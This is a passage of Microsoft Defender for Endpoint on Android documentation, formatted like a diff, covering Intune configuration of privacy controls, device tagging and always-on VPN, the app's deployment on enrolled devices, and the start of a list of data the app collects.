- |Manage Network protection Detection for Certificates|0: Disable <br/> 1: Audit mode (default) <br/> 2: Enable <br/><br/> When network protection is enabled, Audit mode for certificate detection is enabled by default. In audit mode, notification alerts are sent to SOC admins, but no end user notifications are shown when Defender detects a bad certificate. Admins can disable this detection with the value 0 or enable full feature functionality by setting the value 2. When the value is 2, end user notifications are sent to users and alerts are sent to SOC admins when Defender detects a bad certificate.|
-
-1. Add the required groups to which the policy has to be applied. Review and create the policy.
-
-> [!NOTE]
-> Users need to enable location permission (which is an optional permission); this enables Defender for Endpoint to scan their networks and alert them when there are WIFI-related threats. If the location permission is denied by the user, Defender for Endpoint will only be able to provide limited protection against network threats and will only protect the users from rogue certificates.
--
-## Privacy Controls
-
-Following privacy controls are available for configuring the data that is sent by Defender for Endpoint from Android devices:
-
-|Threat Report |Details |
-|--|-|
-|Malware report |Admins can set up privacy control for malware report. If privacy is enabled, then Defender for Endpoint won't send the malware app name and other app details as part of the malware alert report. |
-|Phish report |Admins can set up privacy control for phishing reports. If privacy is enabled, then Defender for Endpoint won't send the domain name and details of the unsafe website as part of the phishing alert report. |
-|Vulnerability assessment of apps |By default only information about apps installed in the work profile is sent for vulnerability assessment. Admins can disable privacy to include personal apps|
-|Network Protection (preview)| Admins can enable or disable privacy in network protection. If enabled, then Defender won't send network details.|
-
-### Configure privacy alert report
-
-Admins can now enable privacy control for the phishing report, malware report, and network report sent by Microsoft Defender for Endpoint on Android. This configuration ensures that the domain name, app details, and network details, respectively, aren't sent as part of the alert whenever a corresponding threat is detected.
-
-Admin Privacy Controls (MDM) Use the following steps to enable privacy.
-
-1. In Microsoft Intune admin center, go to **Apps > App configuration policies > Add > Managed devices**.
-
-2. Give the policy a **name, Platform > Android enterprise, select the profile type**.
-
-3. Select **Microsoft Defender for Endpoint** as the target app.
-
-4. On the Settings page, select **Use configuration designer** and then select **Add**.
-
-5. Select the required privacy setting -
- - Hide URLs in report
- - Hide URLs in report for personal profile
- - Hide app details in report
- - Hide app details in report for personal profile
- - Enable Network Protection Privacy
-
-6. To enable privacy, enter integer value as 1 and assign this policy to users. By default, this value is set to 0 for MDE in work profile and 1 for MDE on personal profile.
-
-7. Review and assign this profile to targeted devices/users.
-
-### End user privacy controls
-
-These controls help the end user to configure the information shared to their organization.
-
-1. For **Android Enterprise work profile**, end user controls won't be visible. Admins control these settings.
-2. For **Android Enterprise personal profile**, the control is displayed under **Settings> Privacy**.
-3. Users see a toggle for Unsafe Site Info, malicious application, and network protection.
-
-These toggles will only be visible if enabled by the admin. Users can decide if they want to send the information to their organization or not.
-
-Enabling/disabling the above privacy controls won't impact the device compliance check or conditional access.
-
-## Configure vulnerability assessment of apps for BYOD devices
-
-From version 1.0.3425.0303 of Microsoft Defender for Endpoint on Android, you're able to run vulnerability assessments of the OS and apps installed on the onboarded mobile devices.
-
-> [!NOTE]
-> Vulnerability assessment is part of [Microsoft Defender Vulnerability Management](../defender-vulnerability-management/defender-vulnerability-management.md) in Microsoft Defender for Endpoint.
-
-**Notes about privacy related to apps from personal devices (BYOD):**
--- For Android Enterprise with a work profile, only apps installed on the work profile will be supported.-- For other BYOD modes, by default, vulnerability assessment of apps will **not** be enabled. However, when the device is on administrator mode, admins can explicitly enable this feature through Microsoft Intune to get the list of apps installed on the device. For more information, see details below.-
-### Configure privacy for device administrator mode
-
-Use the following steps to **enable vulnerability assessment of apps** from devices in **device administrator** mode for targeted users.
-
-> [!NOTE]
-> By default, this is turned off for devices enrolled with device admin mode.
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) , go to **Devices** > **Configuration profiles** > **Create profile** and enter the following settings:
-
- - **Platform**: Select Android device administrator
- - **Profile**: Select "Custom" and select Create.
-
-2. In the **Basics** section, specify a name and description of the profile.
-
-3. In the **Configuration settings**, select Add **OMA-URI** setting:
-
- - **Name**: Enter a unique name and description for this OMA-URI setting so you can find it easily later.
- - OMA-URI: **./Vendor/MSFT/DefenderATP/DefenderTVMPrivacyMode**
- - Data type: Select Integer in the drop-down list.
- - Value: Enter 0 to disable privacy setting (By default, the value is 1)
-
-4. Select **Next** and assign this profile to targeted devices/users.
-
-### Configure privacy for Android Enterprise work profile
-
-Defender for Endpoint supports vulnerability assessment of apps in the work profile. However, in case you want to turn off this feature for targeted users, you can use the following steps:
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** \> **App configuration policies** \\> **Add** > **Managed devices**.
-2. Give the policy a name; **Platform \> Android Enterprise**; select the profile type.
-3. Select **Microsoft Defender for Endpoint** as the target app.
-4. In Settings page, select **Use configuration designer** and add **DefenderTVMPrivacyMode** as the key and value type as **Integer**
- - To disable vulnerability of apps in the work profile, enter value as `1` and assign this policy to users. By default, this value is set to `0`.
- - For users with key set as `0`, Defender for Endpoint sends the list of apps from the work profile to the backend service for vulnerability assessment.
-5. Select **Next** and assign this profile to targeted devices/users.
-
-Turning the above privacy controls on or off won't impact the device compliance check or conditional access.
-
-## Configure privacy for phishing alert report
-
-Privacy control for phish report can be used to disable the collection of domain name or website information in the phish threat report. This setting gives organizations the flexibility to choose whether they want to collect the domain name when a malicious or phish website is detected and blocked by Defender for Endpoint.
-
-### Configure privacy for phishing alert report on Android Device Administrator enrolled devices:
-
-Use the following steps to turn it on for targeted users:
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) , go to **Devices** > **Configuration profiles** > **Create profile** and enter the following settings:
-
- - **Platform**: Select Android device administrator.
- - **Profile**: Select "Custom" and select **Create**.
-
-2. In the **Basics** section, specify a name and description of the profile.
-
-3. In the **Configuration settings**, select Add **OMA-URI** setting:
-
- - **Name**: Enter a unique name and description for this OMA-URI setting so you can find it easily later.
- - OMA-URI: **./Vendor/MSFT/DefenderATP/DefenderExcludeURLInReport**
- - Data type: Select Integer in the drop-down list.
- - Value: Enter 1 to enable privacy setting. The default value is 0.
-
-4. Select **Next** and assign this profile to targeted devices/users.
-
-Using this privacy control won't impact the device compliance check or conditional access.
-
-### Configure privacy for phishing alert report on Android Enterprise work profile
-
-Use the following steps to turn on privacy for targeted users in the work profile:
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) and go to **Apps** > **App configuration policies** > **Add** > **Managed devices**.
-2. Give the policy a name, **Platform > Android Enterprise**, select the profile type.
-3. Select **Microsoft Defender for Endpoint** as the target app.
-4. In Settings page, select **Use configuration designer** and add **DefenderExcludeURLInReport** as the key and value type as **Integer**.
- - Enter **1 to enable privacy**. The default value is 0.
-5. Select **Next** and assign this profile to targeted devices/users.
-
-Turning the above privacy controls on or off won't impact the device compliance check or conditional access.
-
-## Configure privacy for malware threat report
-
-Privacy control for malware threat report can be used to disable the collection of app details (name and package information) from the malware threat report. This setting gives organizations the flexibility to choose whether they want to collect the app name when a malicious app is detected.
-
-### Configure privacy for malware alert report on Android Device Administrator enrolled devices:
-
-Use the following steps to turn it on for targeted users:
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) , go to **Devices** > **Configuration profiles** > **Create profile** and enter the following settings:
-
- - **Platform**: Select Android device administrator.
- - **Profile**: Select "Custom" and select **Create**.
-
-2. In the **Basics** section, specify a name and description of the profile.
-
-3. In the **Configuration settings**, select Add **OMA-URI** setting:
-
- - **Name**: Enter a unique name and description for this OMA-URI setting so you can find it easily later.
- - OMA-URI: **./Vendor/MSFT/DefenderATP/DefenderExcludeAppInReport**
- - Data type: Select Integer in the drop-down list.
- - Value: Enter 1 to enable privacy setting. The default value is 0.
-
-4. Select **Next** and assign this profile to targeted devices/users.
-
-Using this privacy control won't impact the device compliance check or conditional access. For example, devices with a malicious app will always have a risk level of "Medium".
-
-### Configure privacy for malware alert report on Android Enterprise work profile
-
-Use the following steps to turn on privacy for targeted users in the work profile:
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) and go to **Apps** > **App configuration policies** > **Add** > **Managed devices**.
-2. Give the policy a name, **Platform > Android Enterprise**, select the profile type.
-3. Select **Microsoft Defender for Endpoint** as the target app.
-4. In Settings page, select **Use configuration designer** and add **DefenderExcludeAppInReport** as the key and value type as **Integer**
- - Enter **1 to enable privacy**. The default value is 0.
-5. Select **Next** and assign this profile to targeted devices/users.
-
-Using this privacy control won't impact the device compliance check or conditional access. For example, devices with a malicious app will always have a risk level of "Medium".
-
-## Disable sign-out
-
-Defender for Endpoint supports deployment without the sign-out button in the app to prevent users from signing out of the Defender app. This is important to prevent users from tampering with the device.
-Use the following steps to configure Disable sign-out:
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** > **App configuration policies** > **Add** > **Managed devices**.
-2. Give the policy a name, select **Platform > Android Enterprise**, and select the profile type.
-3. Select **Microsoft Defender for Endpoint** as the target app.
-4. In the Settings page, select **Use configuration designer** and add **Disable Sign Out** as the key and **Integer** as the value type.
- - By default, Disable Sign Out = 1 for Android Enterprise personally owned work profiles, fully managed, company owned personally enabled profiles and 0 for device administrator mode.
- - Admins need to make Disable Sign Out = 0 to enable the sign-out button in the app. Users will be able to see the sign-out button once the policy is pushed.
-5. Select **Next** and assign this profile to targeted devices and users.
-
-> [!IMPORTANT]
-> This feature is in Public Preview. The following information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## Device Tagging
-
-Defender for Endpoint on Android enables bulk tagging the mobile devices during onboarding by allowing the admins to set up tags via Intune. Admin can configure the device tags through Intune via configuration policies and push them to user's devices. Once the User installs and activates Defender, the client app passes the device tags to the Security Portal. The Device tags appear against the devices in the Device Inventory.
-
-Use the following steps to configure the Device tags:
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), go to **Apps** > **App configuration policies** > **Add** > **Managed devices**.
-2. Give the policy a name, select **Platform > Android Enterprise**, and select the profile type.
-3. Select **Microsoft Defender for Endpoint** as the target app.
-4. In Settings page, select Use configuration designer and add **DefenderDeviceTag** as the key and value type as **String**.
- - Admin can assign a new tag by adding the key **DefenderDeviceTag** and setting a value for device tag.
- - Admin can edit an existing tag by modifying the value of the key **DefenderDeviceTag**.
- - Admin can delete an existing tag by removing the key **DefenderDeviceTag**.
-
-5. Click Next and assign this policy to targeted devices and users.
--
-> [!NOTE]
-> The Defender app needs to be opened for tags to be synced with Intune and passed to Security Portal. It may take up to 18 hours for tags to reflect in the portal.
-
-## Related articles
--- [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md)-- [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)
security Android Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-intune.md
- Title: Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune
-description: Describes how to deploy Microsoft Defender for Endpoint on Android with Microsoft Intune
------- m365-security-- tier3-- mde-android-- Previously updated : 02/22/2023--
-# Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Learn how to deploy Defender for Endpoint on Android on Microsoft Intune Company Portal enrolled devices. For more information about Microsoft Intune device enrollment, see [Enroll your device](/mem/intune/user-help/enroll-device-android-company-portal).
-
-> [!NOTE]
-> **Defender for Endpoint on Android is now available on [Google Play](https://play.google.com/store/apps/details?id=com.microsoft.scmx)**
->
-> You can connect to Google Play from Microsoft Intune to deploy Defender for Endpoint app across Device Administrator and Android Enterprise enrollment modes.
->
-> Updates to the app are automatic via Google Play.
-
-## Deploy on Device Administrator enrolled devices
-
-Learn how to deploy Defender for Endpoint on Android with Microsoft Intune Company Portal - Device Administrator enrolled devices.
-
-### Add as Android store app
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) , go to **Apps** \>
-**Android Apps** \> **Add** \> **Android store app** and choose **Select**.
-
- :::image type="content" source="media-addandroidstoreapp.png":::
-
-2. On the **Add app** page and in the *App Information* section enter:
-
- - **Name**
- - **Description**
- - **Publisher** as Microsoft.
- - **App store URL** as https://play.google.com/store/apps/details?id=com.microsoft.scmx (Defender for Endpoint app Google Play Store URL)
-
- Other fields are optional. Select **Next**.
-
- :::image type="content" source="media-addappinfo.png":::
-
-3. In the *Assignments* section, go to the **Required** section and select **Add group.** You can then choose the user group(s) that you would like to target Defender for Endpoint on Android app. Choose **Select** and then **Next**.
-
- > [!NOTE]
- > The selected user group should consist of Intune enrolled users.
- >
- > :::image type="content" source="media/363bf30f7d69a94db578e8af0ddd044b.png" alt-text="The Add group pane in the Add App page in the Microsoft Intune admin center portal" lightbox="media/363bf30f7d69a94db578e8af0ddd044b.png":::
-
-4. In the **Review+Create** section, verify that all the information entered is correct and then select **Create**.
-
- In a few moments, the Defender for Endpoint app would be created successfully, and a notification would show up at the top-right corner of the page.
-
- :::image type="content" source="media/86cbe56f88bb6e93e9c63303397fc24f.png" alt-text="The application status pane in the Microsoft Intune admin center portal" lightbox="media/86cbe56f88bb6e93e9c63303397fc24f.png":::
-
-5. In the app information page that is displayed, in the **Monitor** section, select **Device install status** to verify that the device installation has completed successfully.
-
- :::image type="content" source="media/513cf5d59eaaef5d2b5bc122715b5844.png" alt-text="The Device install status page in the Microsoft Defender 365 portal" lightbox="media/513cf5d59eaaef5d2b5bc122715b5844.png":::
-
-### Complete onboarding and check status
-
-1. Once Defender for Endpoint on Android has been installed on the device, you'll see the app icon.
-
- :::image type="content" source="media/7cf9311ad676ec5142002a4d0c2323ca.jpg" alt-text="The Microsoft Defender ATP icon listed in the Search pane" lightbox="media/7cf9311ad676ec5142002a4d0c2323ca.jpg":::
-
-2. Tap the Microsoft Defender for Endpoint app icon and follow the on-screen instructions to complete onboarding the app. The details include end-user acceptance of Android permissions required by Defender for Endpoint on Android.
-
-3. Upon successful onboarding, the device will start showing up on the Devices list in the Microsoft Defender portal.
-
- :::image type="content" source="media/9fe378a1dce0f143005c3aa53d8c4f51.png" alt-text="A device in the Microsoft Defender for Endpoint portal" lightbox="media/9fe378a1dce0f143005c3aa53d8c4f51.png":::
-
-## Deploy on Android Enterprise enrolled devices
-
-Defender for Endpoint on Android supports Android Enterprise enrolled devices.
-
-For more information on the enrollment options supported by Microsoft Intune, see [Enrollment Options](/mem/intune/enrollment/android-enroll).
-
-**Currently, Personally owned devices with work profile and Corporate-owned fully managed user device enrollments are supported for deployment.**
-
-## Add Microsoft Defender for Endpoint on Android as a Managed Google Play app
-
-Follow the steps below to add Microsoft Defender for Endpoint app into your managed Google Play.
-
-1. In [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) , go to **Apps** \> **Android Apps** \> **Add** and select **Managed Google Play app**.
-
- :::image type="content" source="media/579ff59f31f599414cedf63051628b2e.png" alt-text="The application-adding pane in the Microsoft Intune admin center portal" lightbox="media/579ff59f31f599414cedf63051628b2e.png":::
-
-2. On your managed Google Play page that loads subsequently, go to the search box and enter `Microsoft Defender`. Your search should display the Microsoft Defender for Endpoint app in your Managed Google Play. Click on the Microsoft Defender for Endpoint app from the Apps search result.
-
- :::image type="content" source="media/0f79cb37900b57c3e2bb0effad1c19cb.png" alt-text="The Managed Google Play page in the Microsoft Intune admin center portal" lightbox="media/0f79cb37900b57c3e2bb0effad1c19cb.png":::
-
-3. In the App description page that comes up next, you should be able to see app details on Defender for Endpoint. Review the information on the page and then select **Approve**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/07e6d4119f265037e3b80a20a73b856f.png" alt-text="The page of Managed Google Play in the Microsoft Intune admin center portal" lightbox="media/07e6d4119f265037e3b80a20a73b856f.png":::
-
-4. You'll be presented with the permissions that Defender for Endpoint obtains for it to work. Review them and then select **Approve**.
-
- :::image type="content" source="media/206b3d954f06cc58b3466fb7a0bd9f74.png" alt-text="The permissions approval page in the Microsoft Defender 365 portal" lightbox="media/206b3d954f06cc58b3466fb7a0bd9f74.png":::
-
-5. You'll be presented with the Approval settings page. The page confirms your preference to handle new app permissions that Defender for Endpoint on Android might ask. Review the choices and select your preferred option. Select **Done**.
-
- By default, managed Google Play selects **Keep approved when app requests new permissions**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/ffecfdda1c4df14148f1526c22cc0236.png" alt-text=" The approval settings configuration completion page in the in the Microsoft Defender 365 portal" lightbox="media/ffecfdda1c4df14148f1526c22cc0236.png":::
-
-6. After the permissions handling selection is made, select **Sync** to sync Microsoft Defender for Endpoint to your apps list.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/34e6b9a0dae125d085c84593140180ed.png" alt-text="The Sync pane in the Microsoft Defender 365 portal" lightbox="media/34e6b9a0dae125d085c84593140180ed.png":::
-
-7. The sync will complete in a few minutes.
-
- :::image type="content" source="media/9fc07ffc150171f169dc6e57fe6f1c74.png" alt-text="The application sync status pane in the Android apps page in the Microsoft Defender 365 portal" lightbox="media/9fc07ffc150171f169dc6e57fe6f1c74.png":::
-
-8. Select the **Refresh** button in the Android apps screen and Microsoft Defender for Endpoint should be visible in the apps list.
-
- :::image type="content" source="media/fa4ac18a6333335db3775630b8e6b353.png" alt-text="The page displaying the synced application" lightbox="media/fa4ac18a6333335db3775630b8e6b353.png":::
-
-9. Defender for Endpoint supports App configuration policies for managed devices via Microsoft Intune. This capability can be leveraged to select different configurations for Defender.
-
- 1. In the **Apps** page, go to **Policy > App configuration policies > Add > Managed devices**.
-
- :::image type="content" source="media/android-mem.png" alt-text="The App configuration policies pane in the Microsoft Intune admin center portal" lightbox="media/android-mem.png":::
-
- 1. In the **Create app configuration policy** page, enter the following details:
-
- - Name: Microsoft Defender for Endpoint.
- - Choose **Android Enterprise** as platform.
- - Choose **Personally-owned Work Profile only** or **Fully Managed, Dedicated, and Corporate-owned work profile only** as Profile Type.
- - Click **Select App**, choose **Microsoft Defender**, select **OK** and then **Next**.
-
- :::image type="content" source="media/android-create-app.png" alt-text=" Screenshot of the Associated app details pane." lightbox="media/android-create-app.png":::
-
- 1. Select **Permissions** \> **Add**. From the list, select the available app permissions \> **OK**.
- 1. Select an option for each permission to grant with this policy:
-
- - **Prompt** - Prompts the user to accept or deny.
- - **Auto grant** - Automatically approves without notifying the user.
- - **Auto deny** - Automatically denies without notifying the user.
-
- 1. Go to the **Configuration settings** section and choose **'Use configuration designer'** in Configuration settings format.
-
- :::image type="content" alt-text="Image of android create app configuration policy." source="media/configurationformat.png" lightbox="media/configurationformat.png":::
-
- 1. Click on **Add** to view a list of supported configurations. Select the required configuration and click on **Ok**.
-
- :::image type="content" alt-text="Image of selecting configuration policies for android." source="media/selectconfigurations.png" lightbox="media/selectconfigurations.png":::
-
- 1. You should see all the selected configurations listed. You can change the configuration value as required and then select **Next**.
-
- :::image type="content" alt-text="Image of selected configuration policies." source="media/listedconfigurations.png" lightbox="media/listedconfigurations.png":::
-
- 1. In the **Assignments** page, select the user group to which this app config policy would be assigned. Click **Select groups to include** and selecting the applicable group and then selecting **Next**. The group selected here is usually the same group to which you would assign Microsoft Defender for Endpoint Android app.
-
- :::image type="content" source="media/android-select-group.png" alt-text="The Selected groups pane" lightbox="media/android-select-group.png":::
-
- 1. In the **Review + Create** page that comes up next, review all the information and then select **Create**.
-
- The app configuration policy for Defender for Endpoint is now assigned to the selected user group.
-
-10. Select **Microsoft Defender** app in the list \> **Properties** \>
-**Assignments** \> **Edit**.
-
- :::image type="content" source="media-properties.png":::
-
-11. Assign the app as a *Required* app to a user group. It is automatically installed in the *work profile* during the next sync of the device via Company Portal app. This assignment can be done by navigating to the *Required* section \> **Add group,** selecting the user group and click **Select**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/ea06643280075f16265a596fb9a96042.png" alt-text="The Edit application page" lightbox="media/ea06643280075f16265a596fb9a96042.png":::
-
-12. In the **Edit Application** page, review all the information that was entered above. Then select **Review + Save** and then **Save** again to commence assignment.
-
-### Auto Setup of Always-on VPN
-
-Defender for Endpoint supports Device configuration policies for managed devices via Microsoft Intune. This capability can be leveraged to **Auto setup of Always-on VPN** on Android Enterprise enrolled devices, so the end user does not need to set up VPN service while onboarding.
-
-1. On **Devices**, select **Configuration Profiles** \> **Create Profile** \> **Platform** \> **Android Enterprise**
-
- Select **Device restrictions** under one of the following, based on your device enrollment type:
- - **Fully Managed, Dedicated, and Corporate-Owned Work Profile**
- - **Personally owned Work Profile**
-
- Select **Create**.
-
- :::image type="content" source="media/1autosetupofvpn.png" alt-text="The Configuration profiles menu item in the Policy pane" lightbox="media/1autosetupofvpn.png":::
-
-2. **Configuration Settings**
- Provide a **Name** and a **Description** to uniquely identify the configuration profile.
-
- :::image type="content" source="media/2autosetupofvpn.png" alt-text="The devices configuration profile Name and Description fields in the Basics pane" lightbox="media/2autosetupofvpn.png":::
-
-3. Select **Connectivity** and configure VPN:
-
- - Enable **Always-on VPN**
-
- Set up a VPN client in the work profile to automatically connect and reconnect to the VPN whenever possible. Only one VPN client can be configured for always-on VPN on a given device, so be sure to have no more than one always-on VPN policy deployed to a single device.
-
- - Select **Custom** in VPN client dropdown list
-
- Custom VPN in this case is Defender for Endpoint VPN which is used to provide the Web Protection feature.
-
- > [!NOTE]
- > Microsoft Defender for Endpoint app must be installed on user's device, in order to functioning of auto setup of this VPN.
-
- - Enter **Package ID** of the Microsoft Defender for Endpoint app in Google Play store. For the Defender app URL <https://play.google.com/store/apps/details?id=com.microsoft.scmx>, Package ID is **com.microsoft.scmx**
-
- - **Lockdown mode** Not configured (Default)
-
- :::image type="content" source="media/3autosetupofvpn.png" alt-text="The Connectivity pane under the Configuration settings tab" lightbox="media/3autosetupofvpn.png":::
-
-4. **Assignment**
-
- In the **Assignments** page, select the user group to which this app config policy would be assigned. Choose **Select groups** to include and selecting the applicable group and then select **Next**. The group selected here is usually the same group to which you would assign Microsoft Defender for Endpoint Android app.
-
- :::image type="content" source="media/4autosetupofvpn.png" alt-text="Screenshot of the devices configuration profile Assignment pane in the Device restrictions." lightbox="media/4autosetupofvpn.png":::
-
-5. In the **Review + Create** page that comes up next, review all the information and then select **Create**.
-The device configuration profile is now assigned to the selected user group.
-
- :::image type="content" source="media/5autosetupofvpn.png" alt-text="A devices configuration profile 's provision for Review + create" lightbox="media/5autosetupofvpn.png":::
-
-## Check status and complete onboarding
-
-1. Confirm the installation status of Microsoft Defender for Endpoint on Android by clicking on the **Device Install Status**. Verify that the device is displayed here.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/900c0197aa59f9b7abd762ab2b32e80c.png" alt-text="The device installation status pane" lightbox="media/900c0197aa59f9b7abd762ab2b32e80c.png":::
-
-2. On the device, you can validate the onboarding status by going to the **work profile**. Confirm that Defender for Endpoint is available and that you are enrolled to the **Personally owned devices with work profile**. If you are enrolled to a **Corporate-owned, fully managed user device**, you will have a single profile on the device where you can confirm that Defender for Endpoint is available.
-
- :::image type="content" source="media/c2e647fc8fa31c4f2349c76f2497bc0e.png" alt-text="The application display pane" lightbox="media/c2e647fc8fa31c4f2349c76f2497bc0e.png":::
-
-3. When the app is installed, open the app and accept the permissions and then your onboarding should be successful.
-
- :::image type="content" source="mediE-new.png":::
-
-4. At this stage the device is successfully onboarded onto Defender for Endpoint on Android. You can verify this on the [Microsoft Defender portal](https://security.microsoft.com) by navigating to the **Device Inventory** page.
-
- :::image type="content" source="media/9fe378a1dce0f143005c3aa53d8c4f51.png" alt-text="The Microsoft Defender for Endpoint portal" lightbox="media/9fe378a1dce0f143005c3aa53d8c4f51.png":::
-
-## Set up Microsoft Defender in Personal Profile on Android Enterprise in BYOD mode
-
-### Set up Microsoft Defender in Personal Profile
-
-Admins can go to the [Microsoft Endpoint Management admin center](https://endpoint.microsoft.com) to set up and configure Microsoft Defender support in personal profiles by following these steps:
-
-1. Go to **Apps> App configuration policies** and click on **Add**. Select **Managed Devices**.
-
- > [!div class="mx-imgBorder"]
- > ![Image of adding app configuration policy.](media/addpolicy.png)
-
-1. Enter **Name** and **Description** to uniquely identify the configuration policy. Select platform as **'Android Enterprise'**, Profile type as **'Personally-owned work profile only'** and Targeted app as **'Microsoft Defender'**.
-
- > [!div class="mx-imgBorder"]
- > ![Image of naming configuration policy.](media/selectapp.png)
-
-1. On the settings page, in **'Configuration settings format'**, select **'Use configuration designer'** and click on **Add**. From the list of configurations that are displayed, select **'Microsoft Defender in Personal profile'**.
-
- > [!div class="mx-imgBorder"]
- > ![Image of configuring personal profile.](media/addconfiguration.png)
-
-1. The selected configuration will be listed. Change the **configuration value to 1** to enable Microsoft Defender support personal profiles. A notification will appear informing the admin about the same. Click on **Next**.
-
- > [!div class="mx-imgBorder"]
- > ![Image of changing config value.](media/changeconfigvalue.png)
-
-1. **Assign** the configuration policy to a group of users. **Review and create** the policy.
-
- > [!div class="mx-imgBorder"]
- > ![Image of reviewing and creating policy.](media/savepolicy.png)
-
-Admins also can set up **privacy controls** from the Microsoft Intune admin center to control what data can be sent by the Defender mobile client to the security portal. For more information, see [configuring privacy controls](android-configure.md).
-
-Organizations can communicate to their users to protect Personal profile with Microsoft Defender on their enrolled BYOD devices.
--- Pre-requisite: Microsoft Defender must be already installed and active in work profile to enabled Microsoft Defender in personal profiles.-
-### To complete onboarding a device
-
-1. Install the Microsoft Defender application in a personal profile with a personal Google Play store account.
-2. Install the Company portal application on personal profile. No sign-in is required.
-3. When a user launches the application, they'll see the sign-in screen. **Login using corporate account only**.
-4. On a successful login, users will see the following screens:
- 1. **EULA screen**: Presented only if the user has not consented already in the Work profile.
- 2. **Notice screen**: Users need to provide consent on this screen to move forward with onboarding the application. This is required only during the first run of the app.
-5. Provide the required permissions to complete onboarding.
-
-> [!NOTE]
-> **Pre-requisite:**
->
-> 1. The Company portal needs to be enabled on personal profile.
-> 2. Microsoft Defender needs to be already installed and active in work profile.
-
-## Related topics
--- [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md)-- [Configure Microsoft Defender for Endpoint on Android features](android-configure.md)
security Android Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-privacy.md
- Title: Microsoft Defender for Endpoint on Android - Privacy information
-description: Privacy controls, how to configure policy settings that impact privacy and information about the diagnostic data collected in Microsoft Defender for Endpoint on Android.
------- m365-security-- tier3-- mde-android-- Previously updated : 12/18/2020--
-# Microsoft Defender for Endpoint on Android - Privacy information
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Defender for Endpoint on Android collects information from your configured Android devices and stores it in the same tenant where you have Defender for Endpoint. The information is collected to help keep Defender for Endpoint for Android secure, up to date, performing as expected, and to support the service.
-
-For more information about data storage, see [Microsoft Defender for Endpoint data storage and privacy](data-storage-privacy.md).
-
-Information is collected to help keep Defender for Endpoint for Android secure, up to date, performing as expected and to support the service.
-
-For more information on most common privacy questions about Microsoft Defender for Endpoint on Android and iOS mobile devices, see [Microsoft Defender for Endpoint and your privacy on Android and iOS mobile devices](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-and-your-privacy-on-android-and-ios-mobile-devices-4109bc54-8ec5-4433-9c33-d359b75ac22a).
-
-## Required Data
-
-Required data consists of data that is necessary to make Defender for Endpoint for Android work as expected. This data is essential to the operation of the service and can include data related to the end user, organization, device, and apps. Here's a list of the types of data being collected:
-
-### App information
-
-Information about **malicious** Android application packages (APKs) on the device including
--- Install source-- Storage location (file path) of the APK-- Time of install, size of APK and permissions-
-For Android Enterprise Fully managed devices - Information about Android application packages (APKs) installed on the device including
--- Name and package name of the app-- Version number of the app-- Vendor name-
-For Android Enterprise with a work profile - Information about Android application packages (APKs) installed on the Work profile of the device including
--- Name and package name of the app-- Version number of the app-- Vendor name-
-*Your organization can also choose to configure Defender for Endpoint to send information about all apps installed on the device. By default, this information is not sent to your organization.*
--
-### Web page / Network information
--- Full URL of the website only when a malicious connection or web page is detected and blocked.-- Connection information-- Protocol type (such as HTTP, HTTPS, etc.)-
-### Device and account information
--- Device information such as date & time, Android version, OEM model, CPU info, and Device identifier.-- Device identifier is one of the below:
- - Wi-Fi adapter MAC address
- - [Android ID](https://developer.android.com/reference/android/provider/Settings.Secure#ANDROID_ID) (as generated by Android at the time of first boot of the device).
- - Randomly generated globally unique identifier (GUID).
--- Tenant, Device and User information
- - Microsoft Entra Device ID and Azure User ID: Uniquely identifies the device, User respectively at Microsoft Entra ID.
- - Azure tenant ID: GUID that identifies your organization within Microsoft Entra ID.
- - Microsoft Defender for Endpoint org ID: Unique identifier associated with the enterprise that the device belongs to. Allows Microsoft to identify whether issues are impacting a select set of enterprises and how many enterprises are impacted.
- - User Principal Name: Email ID of the user
-
-### Product and service usage data
-
